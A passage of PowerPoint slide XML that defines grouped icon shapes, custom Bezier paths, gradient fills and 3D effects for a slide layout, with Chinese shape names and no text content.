                        <a:pt x="3236" y="20042"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="13499" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9026" y="0"/>
                        <a:pt x="5399" y="3626"/>
                        <a:pt x="5399" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5399" y="9467"/>
                        <a:pt x="5742" y="10754"/>
                        <a:pt x="6341" y="11884"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="709" y="17515"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="713" y="17520"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="274" y="17953"/>
                        <a:pt x="0" y="18552"/>
                        <a:pt x="0" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20533"/>
                        <a:pt x="1066" y="21599"/>
                        <a:pt x="2382" y="21599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3047" y="21599"/>
                        <a:pt x="3647" y="21326"/>
                        <a:pt x="4079" y="20885"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4078" y="20884"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9708" y="15255"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10839" y="15856"/>
                        <a:pt x="12128" y="16200"/>
                        <a:pt x="13499" y="16200"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17973" y="16200"/>
                        <a:pt x="21600" y="12573"/>
                        <a:pt x="21600" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="3626"/>
                        <a:pt x="17973" y="0"/>
                        <a:pt x="13499" y="0"/>
                      </a:cubicBezTo>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37" name="AutoShape 127"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3687085" y="3122140"/>
                  <a:ext cx="109538" cy="1087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160" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9025" y="0"/>
                        <a:pt x="0" y="9025"/>
                        <a:pt x="0" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20954"/>
                        <a:pt x="644" y="21600"/>
                        <a:pt x="1440" y="21600"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2235" y="21600"/>
                        <a:pt x="2880" y="20954"/>
                        <a:pt x="2880" y="20160"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2880" y="10618"/>
                        <a:pt x="10617" y="2880"/>
                        <a:pt x="20160" y="2880"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20955" y="2880"/>
                        <a:pt x="21599" y="2234"/>
                        <a:pt x="21599" y="1440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="645"/>
                        <a:pt x="20955" y="0"/>
                        <a:pt x="20160" y="0"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="449" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="1199541" y="2484779"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Group 42"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1199541" y="2484779"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201205" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="46" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="47" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630725" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Oval 43"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1540736" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solid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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="43" name="Group 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1672516" y="4367800"/>
                <a:ext cx="328869" cy="328308"/>
                <a:chOff x="2581275" y="2582069"/>
                <a:chExt cx="465138" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="44" name="AutoShape 128"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2581275" y="2582069"/>
                  <a:ext cx="465138" cy="4643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4850" y="12150"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13851" y="12150"/>
                        <a:pt x="12926" y="11859"/>
                        <a:pt x="12124" y="11386"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="11892" y="11618"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11132" y="12377"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9846" y="13663"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9593" y="13916"/>
                        <a:pt x="9451" y="14260"/>
                        <a:pt x="9451" y="14617"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="9451" y="16200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="8101" y="16200"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7356" y="16200"/>
                        <a:pt x="6751" y="16804"/>
                        <a:pt x="6751" y="17549"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6751" y="18900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5170" y="18900"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4812" y="18900"/>
                        <a:pt x="4469" y="19042"/>
                        <a:pt x="4216" y="19295"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3259" y="20252"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1352" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1350" y="18326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9223" y="10467"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9223" y="10467"/>
                        <a:pt x="9224" y="10468"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10215" y="9477"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="9741" y="8674"/>
                        <a:pt x="9451" y="7748"/>
                        <a:pt x="9451" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9451" y="3767"/>
                        <a:pt x="11869" y="1350"/>
                        <a:pt x="14850" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17832" y="1350"/>
                        <a:pt x="20250" y="3767"/>
                        <a:pt x="20250" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20250" y="9732"/>
                        <a:pt x="17832" y="12150"/>
                        <a:pt x="14850" y="12150"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="14850" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11123" y="0"/>
                        <a:pt x="8101" y="3022"/>
                        <a:pt x="8101" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8101" y="7617"/>
                        <a:pt x="8283" y="8438"/>
                        <a:pt x="8582" y="9199"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="383" y="17400"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="17637"/>
                        <a:pt x="0" y="17863"/>
                        <a:pt x="0" y="18225"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="20972"/>
                        <a:pt x="626" y="21599"/>
                        <a:pt x="1349" y="21599"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3374" y="21599"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="21599"/>
                        <a:pt x="3965" y="21455"/>
                        <a:pt x="4202" y="21219"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="5170" y="20249"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6751" y="20249"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7496" y="20249"/>
                        <a:pt x="8101" y="19645"/>
                        <a:pt x="8101" y="18900"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="8101" y="17549"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9451" y="17549"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="10196" y="17549"/>
                        <a:pt x="10801" y="16945"/>
                        <a:pt x="10801" y="16200"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="10801" y="14617"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12400" y="13018"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="13162" y="13317"/>
                        <a:pt x="13982" y="13500"/>
                        <a:pt x="14850" y="13500"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18577" y="13500"/>
                        <a:pt x="21599" y="10477"/>
                        <a:pt x="21599" y="6750"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21599" y="3022"/>
                        <a:pt x="18577" y="0"/>
                        <a:pt x="14850" y="0"/>
                      </a:cubicBezTo>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45" name="AutoShape 129"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2871788" y="2640013"/>
                  <a:ext cx="115888" cy="115888"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T1" fmla="+- 0 10800 134"/>
                    <a:gd name="T2" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T3" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T4" fmla="+- 0 10800 134"/>
                    <a:gd name="T5" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T6" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T7" fmla="+- 0 10800 134"/>
                    <a:gd name="T8" fmla="*/ 10800 h 21333"/>
                    <a:gd name="T9" fmla="*/ 10800 w 21600"/>
                    <a:gd name="T10" fmla="+- 0 10800 134"/>
                    <a:gd name="T11" fmla="*/ 10800 h 21333"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T2"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T3" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T8"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21600" h="21333">
                      <a:moveTo>
                        <a:pt x="13008" y="18684"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9017" y="15850"/>
                        <a:pt x="5542" y="12415"/>
                        <a:pt x="2694" y="8570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3736" y="5628"/>
                        <a:pt x="5693" y="3697"/>
                        <a:pt x="8585" y="2647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12578" y="5489"/>
                        <a:pt x="16048" y="8911"/>
                        <a:pt x="18889" y="12809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17836" y="15730"/>
                        <a:pt x="15883" y="17647"/>
                        <a:pt x="13008" y="18684"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21110" y="11295"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18081" y="7130"/>
                        <a:pt x="14396" y="3496"/>
                        <a:pt x="10161" y="484"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9468" y="-8"/>
                        <a:pt x="8579" y="-134"/>
                        <a:pt x="7778" y="145"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4027" y="1450"/>
                        <a:pt x="1463" y="3983"/>
                        <a:pt x="145" y="7687"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="7962"/>
                        <a:pt x="0" y="8252"/>
                        <a:pt x="0" y="8537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9071"/>
                        <a:pt x="167" y="9596"/>
                        <a:pt x="487" y="10041"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3525" y="14213"/>
                        <a:pt x="7211" y="17850"/>
                        <a:pt x="11431" y="20850"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12122" y="21338"/>
                        <a:pt x="13010" y="21466"/>
                        <a:pt x="13812" y="21188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17563" y="19893"/>
                        <a:pt x="20133" y="17356"/>
                        <a:pt x="21451" y="13647"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21551" y="13372"/>
                        <a:pt x="21600" y="13081"/>
                        <a:pt x="21600" y="12796"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21600" y="12265"/>
                        <a:pt x="21429" y="11740"/>
                        <a:pt x="21110" y="11295"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13493" y="2910"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="59" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="60" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="61" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId1"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="62" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId2"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="81" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId3"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="82" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId4"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
